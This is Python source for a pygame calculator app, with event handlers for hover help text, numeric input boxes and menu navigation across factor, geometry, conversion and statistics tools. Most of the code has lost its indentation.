def manage_mousemotion(self, event):
    """Update self.hover_text with help for the widget under the cursor.

    `event` is unused but kept for the uniform handler signature used by
    get_events().
    """
    mouse_pos = pygame.mouse.get_pos()
    # Hover help only exists inside the calculator menus; the six names
    # excluded here are the category-selection menus.
    if (self.active_menu != 'main_menu'
        and self.active_menu != 'factors_menu'
        and self.active_menu != 'converters_menu'
        and self.active_menu != 'geometry_menu'
        and self.active_menu != 'algebra_menu'
        and self.active_menu != 'data_processing_menu'):
        # Buttons common to every calculator menu.
        if self.answer_button.button.collidepoint(mouse_pos):
            self.hover_text = 'Scroll to move the text left and right.'
        elif self.calculate_button.button.collidepoint(mouse_pos):
            self.hover_text = 'Click to calculate answer, or press the enter key.'
        elif self.back_button.button.collidepoint(mouse_pos):
            self.hover_text = 'Return to previous menu.'
        elif self.hover_text_help.button.collidepoint(mouse_pos):
            self.hover_text = 'Do I need to explain everything?'
        else:
            self.hover_text = 'Hover cursor over a button for help.'
        # Menu-specific input boxes may then override the generic text.
        # Get factors menu.
        if self.active_menu == 'get_factors_menu':
            if self.input_button_4.button.collidepoint(mouse_pos):
                self.hover_text = 'Enter the number you want to factor.'
        # Maintain ratio menu.
        elif self.active_menu == 'mar_menu':
            if self.input_button_1.button.collidepoint(mouse_pos):
                self.hover_text = 'Width of source surface.'
            elif self.input_button_3.button.collidepoint(mouse_pos):
                self.hover_text = 'Height of source surface.'
            elif self.input_button_5.button.collidepoint(mouse_pos):
                self.hover_text = 'Width of destination surface.'
            elif self.input_button_7.button.collidepoint(mouse_pos):
                self.hover_text = 'Height of destination surface.'
        # Solid polygon menu.
        elif self.active_menu == 'solid_polygon_menu':
            if self.input_button_4.button.collidepoint(mouse_pos):
                self.hover_text = 'Enter the number of sides of a base.'
        # Temperature convert menu.
        elif self.active_menu == 'temp_menu':
            if self.input_button_2.button.collidepoint(mouse_pos):
                self.hover_text = 'Original temperature.'
            elif self.input_button_4.button.collidepoint(mouse_pos):
                self.hover_text = 'Current temperature scale (F, C, K).'
            elif self.input_button_6.button.collidepoint(mouse_pos):
                self.hover_text = 'Temperature scale to convert to (F, C, K).'
        # Root menu.
        elif self.active_menu == 'root_menu':
            if self.input_button_3.button.collidepoint(mouse_pos):
                self.hover_text = 'Radicand.'
            elif self.input_button_5.button.collidepoint(mouse_pos):
                self.hover_text = 'Index.'
        # Extrapolate menu.
        # NOTE(review): this section and the one below use independent `if`
        # statements rather than elif — behavior preserved as written.
        elif self.active_menu == 'extrapolate_menu':
            if self.input_button_1.button.collidepoint(mouse_pos):
                self.hover_text = 'Start number.'
            if self.input_button_3.button.collidepoint(mouse_pos):
                self.hover_text = 'Modifier.'
            if self.input_button_5.button.collidepoint(mouse_pos):
                self.hover_text = 'Operation (Add, subtract, multiply, divide, exponent, root).'
            if self.input_button_7.button.collidepoint(mouse_pos):
                self.hover_text = 'Number of values from the start number to return.'
        # Other menus.
        elif (self.active_menu == 'common_factors_menu'
              or self.active_menu == 'gcf_menu'
              or self.active_menu == 'lcf_menu'
              or self.active_menu == 'average_menu'
              or self.active_menu == 'median_menu'
              or self.active_menu == 'mode_menu'
              or self.active_menu == 'range_menu'):
            if self.input_button_1.button.collidepoint(mouse_pos):
                self.hover_text = "First number (You don't need to use all four)."
            if self.input_button_3.button.collidepoint(mouse_pos):
                self.hover_text = "Second number (You don't need to use all four)."
            if self.input_button_5.button.collidepoint(mouse_pos):
                self.hover_text = "Third number (You don't need to use all four)."
            if self.input_button_7.button.collidepoint(mouse_pos):
                self.hover_text = "Fourth number (You don't need to use all four)."
def manage_keydown(self, event):
"""Manage pygame KEYDOWN events."""
if event.key == pygame.K_ESCAPE:
exit()
# Get factors input menu.
elif self.active_menu == 'get_factors_input_1':
if event.key == pygame.K_RETURN:
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = str(MATH.get_factors_(self.input_value_4))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'get_factors_menu'
elif event.key == pygame.K_BACKSPACE:
self.input_box_4 = self.input_box_4[:-1]
elif len(self.input_box_4) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_4 += event.unicode
# Common factors input menu.
elif (self.active_menu == 'common_factors_input_1'
or self.active_menu == 'common_factors_input_2'
or self.active_menu == 'common_factors_input_3'
or self.active_menu == 'common_factors_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.common_factors_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'common_factors_menu'
self.active_button = ''
if self.active_menu == 'common_factors_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'common_factors_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'common_factors_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'common_factors_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Greatest common factors input menu.
elif (self.active_menu == 'gcf_input_1'
or self.active_menu == 'gcf_input_2'
or self.active_menu == 'gcf_input_3'
or self.active_menu == 'gcf_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.gcf_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'gcf_menu'
self.active_button = ''
if self.active_menu == 'gcf_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'gcf_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'gcf_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'gcf_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Least common factors input menu.
elif (self.active_menu == 'lcf_input_1'
or self.active_menu == 'lcf_input_2'
or self.active_menu == 'lcf_input_3'
or self.active_menu == 'lcf_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.lcf_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'lcf_menu'
self.active_button = ''
if self.active_menu == 'lcf_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'lcf_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'lcf_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'lcf_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Maintain ratio input menu.
elif (self.active_menu == 'mar_input_1'
or self.active_menu == 'mar_input_2'
or self.active_menu == 'mar_input_3'
or self.active_menu == 'mar_input_4'):
if event.key == pygame.K_RETURN:
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_7 == ''):
None
else:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.input_value_7 = float(self.input_box_7)
source_surf = [self.input_value_1, self.input_value_3]
dest_surf = [self.input_value_5, self.input_value_7]
try:
self.answer = str(MATH.maintain_aspect_ratio_(
source_surf, dest_surf))
except ZeroDivisionError:
pass
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'mar_menu'
if self.active_menu == 'mar_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
self.input_box_1_mod = self.input_box_1
elif len(self.input_box_1_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_1 += event.unicode
self.input_box_1_mod = self.input_box_1
if '.' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('.', '')
elif self.active_menu == 'mar_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
self.input_box_3_mod = self.input_box_3
elif len(self.input_box_3_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_3 += event.unicode
self.input_box_3_mod = self.input_box_3
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif self.active_menu == 'mar_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
self.input_box_5_mod = self.input_box_5
elif len(self.input_box_5_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_5 += event.unicode
self.input_box_5_mod = self.input_box_5
if '.' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('.', '')
elif self.active_menu == 'mar_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
self.input_box_7_mod = self.input_box_7
elif len(self.input_box_7_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_7 += event.unicode
self.input_box_7_mod = self.input_box_7
if '.' in self.input_box_7_mod:
self.input_box_7_mod = self.input_box_7_mod.replace('.', '')
# Solid polygon input menu.
elif self.active_menu == 'solid_polygon_input_1':
if event.key == pygame.K_RETURN:
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = MATH.solid_polygon_info_(self.input_value_4)
self.answer = f'Edges = {self.answer["edges"]}, Vertices = {self.answer["vertices"]}, Faces = {self.answer["faces"]}, Triangles = {self.answer["triangles"]}'
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'solid_polygon_menu'
elif event.key == pygame.K_BACKSPACE:
self.input_box_4 = self.input_box_4[:-1]
elif len(self.input_box_4) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-' or event.unicode == '.':
None
else:
self.input_box_4 += event.unicode
# Temperature convert menu.
elif (self.active_menu == 'temp_input_1'
or self.active_menu == 'temp_input_2'
or self.active_menu == 'temp_input_3'):
if event.key == pygame.K_RETURN:
if (self.input_box_2 == ''
or self.input_box_4 == ''
or self.input_box_6 == ''):
None
else:
self.input_value_2 = float(self.input_box_2)
self.input_value_4 = self.input_box_4.upper()
self.input_value_6 = self.input_box_6.upper()
self.answer = str(MATH.temperature_convert_(self.input_value_2, self.input_value_4, self.input_value_6))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'temp_menu'
if self.active_menu == 'temp_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_2 = self.input_box_2[:-1]
self.input_box_2_mod = self.input_box_2
if '-' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('-', '')
if '.' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('.', '')
elif len(self.input_box_2_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_2
or event.unicode == '.' and '.' in self.input_box_2):
None
else:
self.input_box_2 += event.unicode
self.input_box_2_mod = self.input_box_2
if '-' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('-', '')
if '.' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('.', '')
elif self.active_menu == 'temp_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_4 = self.input_box_4[:-1]
elif len(self.input_box_4) >= 1:
None
elif self.event_check_letter(event):
if (event.unicode == 'F'
or event.unicode == 'f'
or event.unicode == 'C'
or event.unicode == 'c'
or event.unicode == 'K'
or event.unicode == 'k'):
self.input_box_4 += event.unicode
elif self.active_menu == 'temp_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_6 = self.input_box_6[:-1]
elif len(self.input_box_6) >= 1:
None
elif self.event_check_letter(event):
if (event.unicode == 'F'
or event.unicode == 'f'
or event.unicode == 'C'
or event.unicode == 'c'
or event.unicode == 'K'
or event.unicode == 'k'):
self.input_box_6 += event.unicode
# Root menu.
elif (self.active_menu == 'root_input_1'
or self.active_menu == 'root_input_2'):
if event.key == pygame.K_RETURN:
if (self.input_box_3 == ''
or self.input_box_5 == ''):
None
else:
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.answer = str(MATH.root_(self.input_value_3, self.input_value_5))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'root_menu'
if self.active_menu == 'root_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif len(self.input_box_3_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_3
or event.unicode == '.' and '.' in self.input_box_3):
None
else:
self.input_box_3 += event.unicode
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
if self.active_menu == 'root_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
self.input_box_5_mod = self.input_box_5
if '-' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('-', '')
if '.' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('.', '')
elif len(self.input_box_5_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_5
or event.unicode == '.' and '.' in self.input_box_5):
None
else:
self.input_box_5 += event.unicode
self.input_box_5_mod = self.input_box_5
if '-' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('-', '')
if '.' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('.', '')
# Extrapolate menu.
elif (self.active_menu == 'extrapolate_input_1'
or self.active_menu == 'extrapolate_input_2'
or self.active_menu == 'extrapolate_input_3'
or self.active_menu == 'extrapolate_input_4'):
if event.key == pygame.K_RETURN:
check = ['add', 'subtract', 'multiply', 'divide', 'exponent', 'root']
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_5.lower() not in check
or self.input_box_7 == ''):
None
else:
try:
self.input_value_1 = int(self.input_box_1)
self.input_value_3 = int(self.input_box_3)
except ValueError:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = self.input_box_5.lower()
self.input_value_7 = int(self.input_box_7)
self.answer = str(MATH.extrapolate_(self.input_value_1, self.input_value_3, self.input_value_5, self.input_value_7))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'extrapolate_menu'
if self.active_menu == 'extrapolate_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
self.input_box_1_mod = self.input_box_1
if '-' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('-', '')
if '.' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('.', '')
elif len(self.input_box_1_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_1
or event.unicode == '.' and '.' in self.input_box_1):
None
else:
self.input_box_1 += event.unicode
self.input_box_1_mod = self.input_box_1
if '-' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('-', '')
if '.' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('.', '')
if self.active_menu == 'extrapolate_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif len(self.input_box_3_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_3
or event.unicode == '.' and '.' in self.input_box_3):
None
else:
self.input_box_3 += event.unicode
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif self.active_menu == 'extrapolate_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 8:
None
elif self.event_check_letter(event):
self.input_box_5 += event.unicode
elif self.active_menu == 'extrapolate_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-' or event.unicode == '.':
None
else:
self.input_box_7 += event.unicode
# Average menu.
elif (self.active_menu == 'average_input_1'
or self.active_menu == 'average_input_2'
or self.active_menu == 'average_input_3'
or self.active_menu == 'average_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.average_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'average_menu'
self.active_button = ''
if self.active_menu == 'average_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'average_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'average_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'average_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Median menu.
elif (self.active_menu == 'median_input_1'
or self.active_menu == 'median_input_2'
or self.active_menu == 'median_input_3'
or self.active_menu == 'median_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.median_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'median_menu'
self.active_button = ''
if self.active_menu == 'median_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'median_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'median_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'median_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Mode menu.
elif (self.active_menu == 'mode_input_1'
or self.active_menu == 'mode_input_2'
or self.active_menu == 'mode_input_3'
or self.active_menu == 'mode_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.mode_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'mode_menu'
self.active_button = ''
if self.active_menu == 'mode_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'mode_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'mode_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'mode_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Range menu.
elif (self.active_menu == 'range_input_1'
or self.active_menu == 'range_input_2'
or self.active_menu == 'range_input_3'
or self.active_menu == 'range_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.range_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'range_menu'
self.active_button = ''
if self.active_menu == 'range_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'range_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'range_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'range_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
def manage_keyup(self, event):
"""Manage pygame KEYUP events."""
None
def manage_mousebuttondown(self, event):
"""Manage pygame MOUSEBUTTONDOWN events."""
mouse_pos = pygame.mouse.get_pos()
if self.active_menu == 'main_menu':
if self.converters_button.button.collidepoint(mouse_pos):
self.active_button = 'converters_button'
elif self.factors_button.button.collidepoint(mouse_pos):
self.active_button = 'factors_button'
elif self.geometry_button.button.collidepoint(mouse_pos):
self.active_button = 'geometry_button'
elif self.algebra_button.button.collidepoint(mouse_pos):
self.active_button = 'algebra_button'
elif self.data_processing_button.button.collidepoint(mouse_pos):
self.active_button = 'data_processing_button'
elif (self.active_menu != 'main_menu'
and self.active_menu != 'factors_menu'
and self.active_menu != 'converters_menu'
and self.active_menu != 'geometry_menu'
and self.active_menu != 'algebra_menu'
and self.active_menu != 'data_processing_menu'):
if self.answer_button.button.collidepoint(mouse_pos):
if event.button == 4:
self.answer_text_x_mod -= self.answer_text_move_amount
elif event.button == 5:
self.answer_text_x_mod += self.answer_text_move_amount
self.converters_menu_mousebuttondown(event, mouse_pos)
self.factors_menu_mousebuttondown(event, mouse_pos)
self.geometry_menu_mousebuttondown(event, mouse_pos)
self.algebra_menu_mousebuttondown(event, mouse_pos)
self.data_processing_menu_mousebuttondown(event, mouse_pos)
def manage_mousebuttonup(self, event):
"""Manage pygame MOUSEBUTTONUP events."""
mouse_pos = pygame.mouse.get_pos()
if self.active_menu == 'main_menu':
if self.converters_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'converters_menu'
elif self.factors_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'factors_menu'
elif self.geometry_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'geometry_menu'
elif self.algebra_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'algebra_menu'
elif self.data_processing_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'data_processing_menu'
else:
self.active_button = ''
self.factors_menu_mousebuttonup(event, mouse_pos)
self.converters_menu_mousebuttonup(event, mouse_pos)
self.geometry_menu_mousebuttonup(event, mouse_pos)
self.algebra_menu_mousebuttonup(event, mouse_pos)
self.data_processing_menu_mousebuttonup(event, mouse_pos)
def factors_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the factors menu."""
# Main factors menu.
if self.active_menu == 'factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.get_factors_button.button.collidepoint(mouse_pos):
self.active_button = 'get_factors_button'
elif self.common_factors_button.button.collidepoint(mouse_pos):
self.active_button = 'common_factors_button'
